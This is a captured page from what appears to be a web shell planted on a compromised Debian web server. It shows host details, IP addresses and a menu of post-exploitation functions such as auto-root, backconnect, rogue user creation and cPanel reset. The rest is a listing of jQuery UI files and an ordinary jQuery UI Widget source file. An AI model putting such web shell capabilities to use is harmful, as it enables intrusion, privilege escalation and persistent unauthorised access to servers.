Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.25.26
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
misc /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
jquery.effects.blind.min.js
871
B
-rw-r--r--
jquery.effects.bounce.min.js
1.63
KB
-rw-r--r--
jquery.effects.clip.min.js
1.04
KB
-rw-r--r--
jquery.effects.core.min.js
10.58
KB
-rw-r--r--
jquery.effects.drop.min.js
1.05
KB
-rw-r--r--
jquery.effects.explode.min.js
1.61
KB
-rw-r--r--
jquery.effects.fade.min.js
577
B
-rw-r--r--
jquery.effects.fold.min.js
1.1
KB
-rw-r--r--
jquery.effects.highlight.min.j...
914
B
-rw-r--r--
jquery.effects.pulsate.min.js
951
B
-rw-r--r--
jquery.effects.scale.min.js
3.83
KB
-rw-r--r--
jquery.effects.shake.min.js
1.11
KB
-rw-r--r--
jquery.effects.slide.min.js
1.04
KB
-rw-r--r--
jquery.effects.transfer.min.js
816
B
-rw-r--r--
jquery.ui.accordion.css
1.04
KB
-rw-r--r--
jquery.ui.accordion.min.js
8.79
KB
-rw-r--r--
jquery.ui.autocomplete.css
1.08
KB
-rw-r--r--
jquery.ui.autocomplete.min.js
8.55
KB
-rw-r--r--
jquery.ui.button.css
2.41
KB
-rw-r--r--
jquery.ui.button.min.js
6.51
KB
-rw-r--r--
jquery.ui.core.css
1.42
KB
-rw-r--r--
jquery.ui.core.min.js
4.22
KB
-rw-r--r--
jquery.ui.datepicker.css
3.95
KB
-rw-r--r--
jquery.ui.datepicker.min.js
34.79
KB
-rw-r--r--
jquery.ui.dialog.css
1.33
KB
-rw-r--r--
jquery.ui.dialog.min.js
11.25
KB
-rw-r--r--
jquery.ui.draggable.min.js
18.12
KB
-rw-r--r--
jquery.ui.droppable.min.js
5.63
KB
-rw-r--r--
jquery.ui.mouse.min.js
2.67
KB
-rw-r--r--
jquery.ui.position.min.js
3.53
KB
-rw-r--r--
jquery.ui.progressbar.css
358
B
-rw-r--r--
jquery.ui.progressbar.min.js
1.78
KB
-rw-r--r--
jquery.ui.resizable.css
1.14
KB
-rw-r--r--
jquery.ui.resizable.min.js
16.96
KB
-rw-r--r--
jquery.ui.selectable.css
323
B
-rw-r--r--
jquery.ui.selectable.min.js
4.2
KB
-rw-r--r--
jquery.ui.slider.css
1.11
KB
-rw-r--r--
jquery.ui.slider.min.js
10.08
KB
-rw-r--r--
jquery.ui.sortable.min.js
23.13
KB
-rw-r--r--
jquery.ui.tabs.css
1.35
KB
-rw-r--r--
jquery.ui.tabs.min.js
11.36
KB
-rw-r--r--
jquery.ui.theme.css
18.69
KB
-rw-r--r--
jquery.ui.widget.min.js
3.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.ui.widget.min.js
/*! * jQuery UI Widget 1.8.7 * * Copyright 2010, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Widget */ (function(b,j){if(b.cleanData){var k=b.cleanData;b.cleanData=function(a){for(var c=0,d;(d=a[c])!=null;c++)b(d).triggerHandler("remove");k(a)}}else{var l=b.fn.remove;b.fn.remove=function(a,c){return this.each(function(){if(!c)if(!a||b.filter(a,[this]).length)b("*",this).add([this]).each(function(){b(this).triggerHandler("remove")});return l.call(b(this),a,c)})}}b.widget=function(a,c,d){var e=a.split(".")[0],f;a=a.split(".")[1];f=e+"-"+a;if(!d){d=c;c=b.Widget}b.expr[":"][f]=function(h){return!!b.data(h, a)};b[e]=b[e]||{};b[e][a]=function(h,g){arguments.length&&this._createWidget(h,g)};c=new c;c.options=b.extend(true,{},c.options);b[e][a].prototype=b.extend(true,c,{namespace:e,widgetName:a,widgetEventPrefix:b[e][a].prototype.widgetEventPrefix||a,widgetBaseClass:f},d);b.widget.bridge(a,b[e][a])};b.widget.bridge=function(a,c){b.fn[a]=function(d){var e=typeof d==="string",f=Array.prototype.slice.call(arguments,1),h=this;d=!e&&f.length?b.extend.apply(null,[true,d].concat(f)):d;if(e&&d.charAt(0)==="_")return h; e?this.each(function(){var g=b.data(this,a),i=g&&b.isFunction(g[d])?g[d].apply(g,f):g;if(i!==g&&i!==j){h=i;return false}}):this.each(function(){var g=b.data(this,a);g?g.option(d||{})._init():b.data(this,a,new c(d,this))});return h}};b.Widget=function(a,c){arguments.length&&this._createWidget(a,c)};b.Widget.prototype={widgetName:"widget",widgetEventPrefix:"",options:{disabled:false},_createWidget:function(a,c){b.data(c,this.widgetName,this);this.element=b(c);this.options=b.extend(true,{},this.options, this._getCreateOptions(),a);var d=this;this.element.bind("remove."+this.widgetName,function(){d.destroy()});this._create();this._trigger("create");this._init()},_getCreateOptions:function(){return b.metadata&&b.metadata.get(this.element[0])[this.widgetName]},_create:function(){},_init:function(){},destroy:function(){this.element.unbind("."+this.widgetName).removeData(this.widgetName);this.widget().unbind("."+this.widgetName).removeAttr("aria-disabled").removeClass(this.widgetBaseClass+"-disabled ui-state-disabled")}, widget:function(){return this.element},option:function(a,c){var d=a;if(arguments.length===0)return b.extend({},this.options);if(typeof a==="string"){if(c===j)return this.options[a];d={};d[a]=c}this._setOptions(d);return this},_setOptions:function(a){var c=this;b.each(a,function(d,e){c._setOption(d,e)});return this},_setOption:function(a,c){this.options[a]=c;if(a==="disabled")this.widget()[c?"addClass":"removeClass"](this.widgetBaseClass+"-disabled ui-state-disabled").attr("aria-disabled",c);return this}, enable:function(){return this._setOption("disabled",false)},disable:function(){return this._setOption("disabled",true)},_trigger:function(a,c,d){var e=this.options[a];c=b.Event(c);c.type=(a===this.widgetEventPrefix?a:this.widgetEventPrefix+a).toLowerCase();d=d||{};if(c.originalEvent){a=b.event.props.length;for(var f;a;){f=b.event.props[--a];c[f]=c.originalEvent[f]}}this.element.trigger(c,d);return!(b.isFunction(e)&&e.call(this.element[0],c,d)===false||c.isDefaultPrevented())}}})(jQuery);
Close